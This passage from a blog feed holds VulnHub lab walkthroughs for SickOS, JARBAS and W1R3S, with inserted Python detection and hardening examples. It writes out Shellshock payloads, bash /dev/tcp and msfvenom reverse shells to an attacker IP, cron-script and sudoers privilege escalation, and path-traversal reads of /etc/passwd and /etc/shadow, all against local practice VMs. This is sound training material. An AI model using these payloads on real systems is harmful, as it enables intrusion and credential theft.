src="/2023/03/15/SickOS/image-20230314103954962.png" alt="image-20230314103954962"></p><p><img src="/2023/03/15/SickOS/image-20230314105247196.png" alt="image-20230314105247196"></p><h3 id="方法二"><a href="#方法二" class="headerlink" title="Method 2"></a>Method 2</h3><p>Nikto finds a Shellshock vulnerability.</p><p><a href="https://blog.csdn.net/smli_ng/article/details/105994754">Detailed Nikto tutorial</a></p><blockquote><p><strong>Common nikto options</strong><br>-update: update plugins and databases</p><p>-host: target URL to scan</p><p>-id username:password: HTTP authentication</p><p>-list-plugins: list all available plugins</p><p>-evasion: IDS/IPS evasion techniques (see the worked examples for details)</p><p>-port: port to scan (default 80)</p><p>-ssl: use SSL</p><p>-useproxy: use an HTTP proxy</p><p>-vhost: virtual host name, for when one IP serves several sites</p><p><strong>nikto interactive keys (during a scan)</strong><br>space: report current scan status</p><p>v: verbose output</p><p>d: debug output</p><p>e: show HTTP errors</p><p>p: show scan progress</p><p>r: show redirects</p><p>c: show cookies</p><p>a: show the authentication process</p><p>q: quit</p><p>N: scan the next target</p><p>P: pause the scan</p></blockquote><p><code>nikto -h 192.168.37.140 -useproxy 192.168.37.140:3128</code> Note that the proxy is needed here.</p><p><img src="/2023/03/15/SickOS/image-20230314235545518.png" alt="image-20230314235545518"></p><blockquote><p><strong>Cause of the vulnerability</strong></p><p>bash imports functions from environment variables whose value begins with "<code>(){</code>". When it parses such a crafted variable it does not stop at the closing "<code>}</code>" of the function body but goes on to execute whatever shell commands follow it.</p></blockquote><p><strong>Checking the vulnerability</strong></p><p><code>curl --proxy http://192.168.37.140:3128 -v -A "() { :;};echo;/usr/bin/whoami" http://192.168.37.140/cgi-bin/status</code></p><p><img src="/2023/03/15/SickOS/image-20230315000417335.png" alt="image-20230315000417335"></p><p><strong>Reverse shell</strong></p><p><code>curl --proxy http://192.168.37.140:3128 -v -A "() { :; }; /bin/bash -i >& /dev/tcp/192.168.37.135/7777 0>&1" http://192.168.37.140//cgi-bin/status</code></p><blockquote><p>Tip</p><p>When the shell you get is poorly interactive, Python's pty module can turn it into an interactive one:</p><p><code>python3 -c 'import pty; pty.spawn("/bin/bash")'</code></p></blockquote><p><strong>Look at the files in the web root</strong></p><p><img src="/2023/03/15/SickOS/image-20230315002609547.png" alt="image-20230315002609547"></p><p>Privilege escalation through cron jobs</p><p><img src="/2023/03/15/SickOS/image-20230315003441880.png" alt="image-20230315003441880"></p><p>Filtering on the keyword cron turns up several directories related to scheduled tasks. In cron.d the file automate holds a job that runs a Python file under the web root every minute, so a reverse shell launched from that Python script escalates our privileges.</p><p>Use msfvenom to generate the shell payload:</p><p><a href="https://blog.51cto.com/yyxianren/5720367">msfvenom options overview</a> <a href="https://blog.csdn.net/m0_64444909/article/details/126841128">Building a payload with msfvenom and getting a reverse shell</a></p><p><code>msfvenom -p cmd/unix/reverse_python LHOST=192.168.37.135 LPORT=7778 -f raw</code></p><p><img src="/2023/03/15/SickOS/image-20230315004656083.png" alt="image-20230315004656083"></p><p><img src="/2023/03/15/SickOS/image-20230315004806042.png" alt="image-20230315004806042"></p><p>Objective achieved!</p>]]></content>
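The Shellshock check above relies on the "() {" prefix in the User-Agent reaching bash through a CGI script. As an added example that is not part of the original post, here is the defender's view in Python: a small parser for Apache combined-format access logs that flags requests carrying that prefix in the User-Agent, Referer or request line and singles out /cgi-bin/ targets. The log lines are constructed; the hosts and path are the ones from this walkthrough.

```python
"""Flag Shellshock-style probes in Apache combined-format access logs.
Added example, not from the original post.  The detector looks for the
"() {" function-definition prefix that vulnerable bash versions parsed
out of any environment variable, checks the User-Agent, Referer and
request line, and singles out /cgi-bin/ targets, where a header reaches
bash through CGI.  The log lines are constructed, using the hosts and
path from the walkthrough."""
import re

# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$'
)
FIELDS = ("host", "time", "request", "status", "bytes", "referer", "agent")
# bash accepted any value starting with "() {" as a function definition;
# allow optional whitespace between the parentheses and the brace.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

SAMPLE_LOG = """\
192.168.37.135 - - [15/Mar/2023:00:04:17 +0800] "GET /cgi-bin/status HTTP/1.1" 200 142 "-" "() { :;};echo;/usr/bin/whoami"
192.168.37.135 - - [15/Mar/2023:00:05:02 +0800] "GET /wolfcms/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.37.135 - - [15/Mar/2023:00:06:41 +0800] "GET /index.html HTTP/1.1" 200 0 "() { :; }; /bin/bash -c id" "curl/7.88.1"
10.0.0.7 - - [15/Mar/2023:00:07:13 +0800] "GET /robots.txt HTTP/1.1" 200 45 "-" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Return a dict of the combined-log fields, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return dict(zip(FIELDS, m.groups())) if m else None


def request_path(entry: dict) -> str:
    """Path component of the request line ("GET /x HTTP/1.1" gives "/x")."""
    parts = entry["request"].split(" ")
    return parts[1] if len(parts) > 1 else ""


def classify(entry: dict) -> str:
    """'cgi-shellshock' when the function prefix targets a CGI path,
    'shellshock-probe' when it appears against any other path, else 'clean'."""
    fields = (entry["agent"], entry["referer"], entry["request"])
    if not any(SHELLSHOCK_RE.search(f) for f in fields):
        return "clean"
    return "cgi-shellshock" if "/cgi-bin/" in request_path(entry) else "shellshock-probe"


def scan_log(text: str) -> list:
    """Return (host, path, verdict) for every suspicious line in text."""
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        verdict = classify(entry)
        if verdict != "clean":
            hits.append((entry["host"], request_path(entry), verdict))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

Because the requests in this walkthrough go through Squid on the same host, the web server's own log would record the proxy's address rather than the client's; the client address has to come from Squid's access.log or an X-Forwarded-For header.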
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
<entry>
<title>JARBAS</title>
<link href="/2023/03/11/JARBAS/"/>
<url>/2023/03/11/JARBAS/</url>
<content type="html"><![CDATA[<h2 id="靶场介绍"><a href="#靶场介绍" class="headerlink" title="Target Introduction"></a>Target Introduction</h2><p>Machine name: JARBAS</p><p>Jarbas download: <a href="https://download.vulnhub.com/jarbas/Jarbas.zip">https://download.vulnhub.com/jarbas/Jarbas.zip</a></p><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="Information Gathering"></a>Information Gathering</h2><h3 id="主机发现"><a href="#主机发现" class="headerlink" title="Host Discovery"></a>Host Discovery</h3><p>Target IP address: 192.168.37.139</p><p><img src="/2023/03/11/JARBAS/image-20230309210231914.png" alt="image-20230309210231914"></p><h3 id="nmap扫描"><a href="#nmap扫描" class="headerlink" title="nmap Scan"></a>nmap Scan</h3><p><code>nmap --min-rate 10000 -p- 192.168.37.139</code></p><p>Two runs gave different results, so it is worth repeating the scan once to avoid missing ports.</p><p><img src="/2023/03/11/JARBAS/image-20230309222737897.png" alt="image-20230309222737897"></p><p>Identify the service versions on the open ports:</p><p><code>nmap -sT -sV -O -p22,80,3306,8080 192.168.37.139</code></p><p><img src="/2023/03/11/JARBAS/image-20230309223124729.png" alt="image-20230309223124729"></p><p><code>nmap -sU -p22,80,3306,8080 192.168.37.139</code></p><p><img src="/2023/03/11/JARBAS/image-20230309223208609.png" alt="image-20230309223208609"></p><p>nmap vulnerability scan</p><p><code>nmap --script=vuln -p22,80,3306,8080 192.168.37.139</code></p><p><img src="/2023/03/11/JARBAS/image-20230309223711562.png" alt="image-20230309223711562"></p><p>On port 80 a potential directory listing at /icons is reported.</p><p>On port 8080 a /robots.txt file is found.</p><p>Visit the web service on port 80</p><p><img src="/2023/03/11/JARBAS/image-20230310004017066.png" alt="image-20230310004017066"></p><p>Visit port 8080</p><p><img src="/2023/03/11/JARBAS/image-20230310003928522.png" alt="image-20230310003928522"></p><p>This looks like a back-end login page asking for credentials.</p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="Directory Scan"></a>Directory Scan</h3><p><code>dirsearch -u 192.168.37.139 -x 403</code></p><p><img src="/2023/03/11/JARBAS/image-20230310001619389.png" alt="image-20230310001619389"></p><p>Visit access.html</p><p><img src="/2023/03/11/JARBAS/image-20230310003639361.png" alt="image-20230310003639361"></p><p>These are obviously MD5 hashes; cracking them gives</p><p><img src="/2023/03/11/JARBAS/image-20230310003705540.png" alt="image-20230310003705540"></p><p>The corresponding data:</p><table><thead><tr><th>user</th><th>passwd</th></tr></thead><tbody><tr><td>tiago</td><td>italia99</td></tr><tr><td>trindade</td><td>vipsu</td></tr><tr><td>eder</td><td>marianna</td></tr></tbody></table><p>These are tried against the port 8080 login. After the pairs as listed fail, we try mixing the usernames and passwords.</p><p>In the end eder / vipsu logs in (with so few values Burp Suite was not needed here; with more data, use Burp to find the right pair quickly).</p><h2 id="Getshell"><a href="#Getshell" class="headerlink" title="Getshell"></a>Getshell</h2><p><img src="/2023/03/11/JARBAS/image-20230310110850713.png" alt="image-20230310110850713"></p><p>New Item lets us create a new project. We create one named test1, and while configuring it we see an <code>Execute shell</code> build step, which lets us get a shell through bash.</p><p><img src="/2023/03/11/JARBAS/image-20230310111518081.png" alt="image-20230310111518081"></p><p>The getshell command is: <code>/bin/bash -i >& /dev/tcp/192.168.37.135/7777 0>&1 </code></p><table><thead><tr><th>Command</th><th>Explanation</th></tr></thead><tbody><tr><td>bash -i</td><td>Starts an interactive bash session.</td></tr><tr><td>>&</td><td>Redirects the standard output (and standard error) of what precedes it to the target that follows.</td></tr><tr><td>/dev/tcp/192.168.37.135/7777</td><td>On Linux everything is a file; this path makes the target host open a TCP connection to port 7777 on the attacking machine 192.168.37.135.</td></tr><tr><td>0>&1</td><td>Redirects standard input to wherever standard output already points, so input is read from the same connection.</td></tr></tbody></table><p>Reading the whole bash reverse-shell one-liner:</p><blockquote><p>bash starts an interactive session, its output is tied to the connection the local host opens to port 7777 on the attacker (the TCP 7777 session), and finally keyboard input is tied to that same output, so the result is a bash session reachable over the connection.</p></blockquote><p>The attacking machine listens on port 7777 and the connection comes in.</p><p><img src="/2023/03/11/JARBAS/image-20230310113033089.png" alt="image-20230310113033089"></p><h2 id="提权"><a href="#提权" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h2><p>Check the shell's privileges:</p><p><code>sudo -l</code></p><p><img src="/2023/03/11/JARBAS/image-20230310230354149.png" alt="image-20230310230354149"></p><p>No sudo rights, so we need to escalate.</p><p>Check the scheduled tasks.</p><blockquote><p>Cron jobs schedule commands that have to run periodically. With cron you configure commands or scripts to run at set times, repeatedly. cron is one of the most useful tools on Linux and Unix-like systems. The cron service (daemon) runs in the background and keeps checking the <code>/etc/crontab</code> file and the <code>/etc/cron.*/</code> directories. It also checks the /var/spool/cron/ directory.</p></blockquote><p><img src="/2023/03/11/JARBAS/image-20230310232437353.png" alt="image-20230310232437353"></p><p>There is one scheduled task.</p><p>What it does: every 5 minutes it runs /etc/script/CleaningScript.sh as root, and the output is discarded.</p><p>The script content is as follows:</p><p><img src="/2023/03/11/JARBAS/image-20230310232715965.png" alt="image-20230310232715965"></p><p>Method 1</p><p>Write the getshell payload into /etc/script/CleaningScript.sh and listen on port 7776; once the job runs we get a root shell.</p><p><img src="/2023/03/11/JARBAS/image-20230310233421961.png" alt="image-20230310233421961"></p><p><img src="/2023/03/11/JARBAS/image-20230310233705929.png" alt="image-20230310233705929"></p><p>Method 2</p><p>Modify CleaningScript.sh so that it edits sudoers and grants jenkins passwordless sudo, then let cron run it on schedule:<br><code>echo "echo 'jenkins ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers" >> /etc/script/CleaningScript.sh</code></p><p>sudoers lists the users who may use sudo to temporarily obtain root privileges.</p><p>Root privileges obtained.</p><p><img src="/2023/03/11/JARBAS/image-20230310233734120.png" alt="image-20230310233734120"></p>]]></content>
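The cron weakness used above (a script that root runs every 5 minutes but that jenkins can edit) is the kind of thing an audit should catch. As an added example, not part of the original post, this Python check parses system-crontab lines, looks at the file each job runs and reports scripts that are group- or world-writable or not owned by root; the crontab and script it audits are constructed in a temporary directory, so it runs without touching the real system.

```python
"""Audit cron for the weakness used above: a job root runs on a schedule
whose script a low-privileged account can edit.  Added example, not part
of the original post.  System-crontab lines (five schedule fields, the
user, then the command, as in /etc/crontab and /etc/cron.d) are parsed,
the command's first token is stat'ed, and any script that is world- or
group-writable or not owned by root is reported.  The crontab and script
are constructed in a temporary directory."""
import os
import stat
import tempfile


def parse_system_cron(text: str) -> list:
    """Return (user, command) for each job line; skip blanks, comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split(" ")[0]:
            continue
        parts = line.split(None, 6)
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return jobs


def has_bit(mode: int, bit: int) -> bool:
    """True if the permission bit is set in mode (plain arithmetic, no bitwise ops)."""
    return (mode // bit) % 2 == 1


def audit_script(path: str, run_as: str, root_uid: int = 0) -> list:
    """Findings for one script that cron runs as run_as."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: missing (a writable parent directory would let anyone create it)"]
    if run_as == "root" and st.st_uid != root_uid:
        findings.append(f"{path}: run as root but owned by uid {st.st_uid}")
    if has_bit(st.st_mode, stat.S_IWOTH):
        findings.append(f"{path}: world-writable")
    if has_bit(st.st_mode, stat.S_IWGRP):
        findings.append(f"{path}: group-writable")
    return findings


def audit_crontab(text: str, root_uid: int = 0) -> list:
    """Audit every absolute-path command in a system crontab."""
    findings = []
    for user, command in parse_system_cron(text):
        script = command.split()[0]
        if script.startswith("/"):
            findings.extend(audit_script(script, user, root_uid))
    return findings


def demo() -> list:
    """Recreate the vulnerable layout (every 5 minutes, as root, output
    discarded, script editable by anyone) in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "CleaningScript.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\necho cleaning\n")  # placeholder body
        os.chmod(script, 0o777)  # constructed: mode that lets anyone edit it
        cron = f"*/5 * * * * root {script} 2>/dev/null\n"
        # the file is owned by us, so treat our uid as root for the demo
        return audit_crontab(cron, root_uid=os.getuid())
```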
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
<entry>
<title>W1R3S</title>
<link href="/2023/03/10/W1R3S/"/>
<url>/2023/03/10/W1R3S/</url>
<content type="html"><![CDATA[<h3 id="靶场介绍"><a href="#靶场介绍" class="headerlink" title="Target Introduction"></a>Target Introduction</h3><p>Machine name: W1R3S</p><p>Machine page: <a href="https://www.vulnhub.com/entry/w1r3s-101,220/">https://www.vulnhub.com/entry/w1r3s-101,220/</a></p><p>Download: <strong>Download (image)</strong>: <a href="https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip">https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip</a></p><p>Description: You have been hired to do a penetration test on the W1R3S company's individual server and report all findings. They have asked you to gain root access and find the flag (located in the /root directory).</p><p>Goal: get root privileges and find flag.txt</p><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="Information Gathering"></a>Information Gathering</h3><p>1. Host discovery</p><p>After booting the target, find its IP with an nmap scan:</p><p><code>sudo nmap -sn 192.168.37.0/24</code> (if the IP is unknown, scan before and after powering the target off and compare)</p><p>The IP address is <code>192.168.37.137</code></p><p><img src="/2023/03/10/W1R3S/image-20230418123529176.png" alt="image-20230418123529176"></p><p>2. Port scan</p><p><code>sudo nmap --min-rate 10000 -p- 192.168.37.137</code> The --min-rate option is set so the scan is both complete and accurate.</p><p><img src="/2023/03/10/W1R3S/image-20230418123538301.png" alt="image-20230418123538301"></p><p>Identify the services on the ports:</p><p><code>sudo nmap -sT -sV -O -p21,22,80,3306 192.168.37.137</code> -sT uses TCP connect scanning, -sV gets the version of each service, -O fingerprints the host OS</p><p><img src="/2023/03/10/W1R3S/image-20230418123547253.png" alt="image-20230418123547253"></p><p><code>sudo nmap -sU -p21,22,80,3306 192.168.37.137</code> -sU scans UDP (developers often forget about UDP)</p><p><img src="/2023/03/10/W1R3S/image-20230418123629804.png" alt="image-20230418123629804"></p><p>Priority among the four ports: 80 > 21 > 3306 > 22</p><p>SSH usually only yields to password brute force, so it is the least likely way in.</p><p><code>sudo nmap --script=vuln -p21,22,80,3306 192.168.37.137</code></p><p>Scan the ports with nmap's built-in vulnerability scripts.</p><p><img src="/2023/03/10/W1R3S/image-20230418123645392.png" alt="image-20230418123645392"></p><p>The results show nothing on ports 21 and 22; the web framework on port 80 is WordPress, which is the main place to break in.</p><p>The MAC address shows VMware; in a real environment this would suggest the host is probably a Windows system.</p><h3 id="ftp"><a href="#ftp" class="headerlink" title="ftp"></a>ftp</h3><h4 id="测试ftp是否允许匿名登陆"><a href="#测试ftp是否允许匿名登陆" class="headerlink" title="Test whether FTP allows anonymous login"></a>Test whether FTP allows anonymous login</h4><p><a href="https://www.bilibili.com/read/cv10444306?from=search">FTP (anonymous login) unauthorised access vulnerability</a></p><p>FTP anonymous login usually comes in three forms:<br>1. Username: anonymous, password: an e-mail address or empty<br>2. Username: FTP, password: FTP or empty<br>3. Username: USER, password: pass</p><p><img src="/2023/03/10/W1R3S/image-20230418123751298.png" alt="image-20230418123751298"></p><p>Anonymous login succeeds.</p><p><strong>Note: after logging in to FTP, enter binary to switch the transfer mode</strong> </p><p>The reason is that FTP fetches file contents in ASCII mode by default; when the file is an executable, not switching to binary may corrupt it.</p><p><strong>FTP file download command: wget + file name</strong></p><p><img src="/2023/03/10/W1R3S/image-20230418123806603.png" alt="image-20230418123806603"></p><p>Among them employee-names.txt leaks some sensitive information that may be useful later.</p><p><img src="/2023/03/10/W1R3S/image-20230307004844476.png" alt="image-20230307004844476"></p><h3 id="Web服务"><a href="#Web服务" class="headerlink" title="Web Service"></a>Web Service</h3><h4 id="访问页面"><a href="#访问页面" class="headerlink" title="Visit the page"></a>Visit the page</h4><p><img src="/2023/03/10/W1R3S/image-20230307103605194.png" alt="image-20230307103605194"></p><p>We already know it is a WordPress framework; directory brute-forcing will find the framework's path.</p><h4 id="目录爆破"><a href="#目录爆破" class="headerlink" title="Directory brute force"></a>Directory brute force</h4><p>Brute-force with feroxbuster and the wordlists shipped with Kali, path: <code>/usr/share/seclists/</code></p><p><a href="https://blog.csdn.net/Jiajiajiang_/article/details/88638367">Overview of Kali's built-in wordlists</a></p><p><code>feroxbuster -u http://192.168.37.137 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt</code></p><p>Scan results</p><p><img src="/2023/03/10/W1R3S/image-20230308004531661.png" alt="image-20230308004531661"></p><p>Notable are the wordpress and administrator directories.</p><h4 id="Cuppa-CMS"><a href="#Cuppa-CMS" class="headerlink" title="Cuppa CMS"></a>Cuppa CMS</h4><p>First visit <a href="http://192.168.37.137/administrator">http://192.168.37.137/administrator</a>, which shows a CMS installer.</p><p><img src="/2023/03/10/W1R3S/image-20230308004759753.png" alt="image-20230308004759753"></p><p>Clicking next shows a registration form.</p><p><img src="/2023/03/10/W1R3S/image-20230308004837893.png" alt="image-20230308004837893"></p><p>Filling in arbitrary values and clicking next again fails: it says there is no Administrator permission, so this route is closed.</p><p><img src="/2023/03/10/W1R3S/image-20230308004937654.png" alt="image-20230308004937654"></p><p>Use searchsploit to look for Cuppa CMS vulnerabilities.</p><p><a href="https://blog.csdn.net/qq_63844103/article/details/128405733">[Security tools] searchsploit, the exploit search tool</a> </p><p>A matching vulnerability description is found; the -m option copies (mirrors) an exploit into the current working directory (followed by the exploit ID). </p><p><img src="/2023/03/10/W1R3S/image-20230308110519802.png" alt="image-20230308110519802"></p><p><img src="/2023/03/10/W1R3S/image-20230308231808038.png" alt="image-20230308231808038"></p><p>Passing the parameter via GET gives no result. </p><img src="/2023/03/10/W1R3S/image-20230308231847812.png" alt="image-20230308231847812" style="zoom:50%;"><p>Since $_REQUEST also accepts POST parameters, we try POST with curl:</p><p><code>curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.37.137/administrator/alerts/alertConfigField.php</code></p><p>This returns the contents of /etc/passwd. <a href="http://c.biancheng.net/view/839.html">Explanation of Linux /etc/passwd</a></p><img src="/2023/03/10/W1R3S/image-20230308232053571.png" alt="image-20230308232053571" style="zoom:67%;"><p>Try reading /etc/shadow <a href="http://c.biancheng.net/view/839.html">Linux /etc/shadow (shadow file) explained in detail</a></p><p><code>curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.37.137/administrator/alerts/alertConfigField.php</code></p><p><img src="/2023/03/10/W1R3S/image-20230308233232927.png" alt="image-20230308233232927"></p><p>Collect the three longer entries from /etc/shadow into a txt file and crack them with john.</p><p><img src="/2023/03/10/W1R3S/image-20230308234943255.png" alt="image-20230308234943255"></p><p>Two of the users' passwords are recovered, and w1r3s clearly has the higher privileges.</p><p>Log in remotely over SSH with those credentials.</p><p><img src="/2023/03/10/W1R3S/image-20230309143845639.png" alt="image-20230309143845639"></p><p>Shell obtained.</p><p>Check privileges: <code>sudo -l</code> lists the commands the current user may run with sudo.</p><p><img src="/2023/03/10/W1R3S/image-20230309144316710.png" alt="image-20230309144316710"></p><p>Escalate with sudo: <code>sudo /bin/bash</code></p><p><img src="/2023/03/10/W1R3S/image-20230309144822739.png" alt="image-20230309144822739"></p><p>Get flag.txt, which concludes this machine.</p><p><img src="/2023/03/10/W1R3S/image-20230309145240649.png" alt="image-20230309145240649"></p>]]></content>
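The include in alertConfigField.php above takes urlConfig from $_REQUEST, so blocking GET changes nothing; the fix is to validate the path itself. As an added Python example, not the CMS's own code, here is the unsafe resolution beside a hardened one that confines the path to the configuration directory and an allowlist; the directory, file name and allowlist are constructed.

```python
"""Path-containment check for the file-include weakness above:
alertConfigField.php reads urlConfig from $_REQUEST, so GET and POST
both reach it, and it includes whatever path it is given, which is how
"../../../../etc/passwd" came back.  Added example in Python, not the
CMS's own code: an unsafe lookup beside a hardened one that resolves
the path, refuses anything outside the configuration directory and
requires the name to be on an allowlist.  Directory, file and allowlist
are constructed in a temp dir."""
import os
import tempfile

TRAVERSAL = "../../../../../../../../../etc/passwd"  # the urlConfig value from the walkthrough


def resolve_unsafe(config_dir: str, url_config: str) -> str:
    """Mirror the vulnerable behaviour: join and resolve with no checks,
    so any '..' in url_config walks out of config_dir."""
    return os.path.realpath(os.path.join(config_dir, url_config))


def resolve_safe(config_dir: str, url_config: str, allowed: set) -> str:
    """Hardened lookup: reject absolute or empty paths, anything that
    resolves outside config_dir (symlinks included, via realpath), and
    names not on the allowlist.  Returns the resolved path."""
    if not url_config or os.path.isabs(url_config):
        raise ValueError("absolute or empty path rejected")
    base = os.path.realpath(config_dir)
    target = os.path.realpath(os.path.join(base, url_config))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes configuration directory")
    if os.path.relpath(target, base) not in allowed:
        raise ValueError("file not on allowlist")
    return target


def demo() -> dict:
    """Run both resolvers on a legitimate name and on the traversal value."""
    with tempfile.TemporaryDirectory() as tmp:
        config_dir = os.path.join(tmp, "administrator", "config")
        os.makedirs(config_dir)
        legit = "Configuration.php"  # hypothetical allowlisted file name
        with open(os.path.join(config_dir, legit), "w") as fh:
            fh.write("placeholder\n")
        allowed = {legit}
        base = os.path.realpath(config_dir)
        out = {
            "unsafe_escapes": not resolve_unsafe(config_dir, TRAVERSAL).startswith(base),
            "safe_legit": os.path.basename(resolve_safe(config_dir, legit, allowed)),
        }
        for label, value in (("safe_traversal", TRAVERSAL), ("safe_not_listed", "other.php")):
            try:
                resolve_safe(config_dir, value, allowed)
                out[label] = "allowed"
            except ValueError as exc:
                out[label] = str(exc)
        return out
```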
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
</search>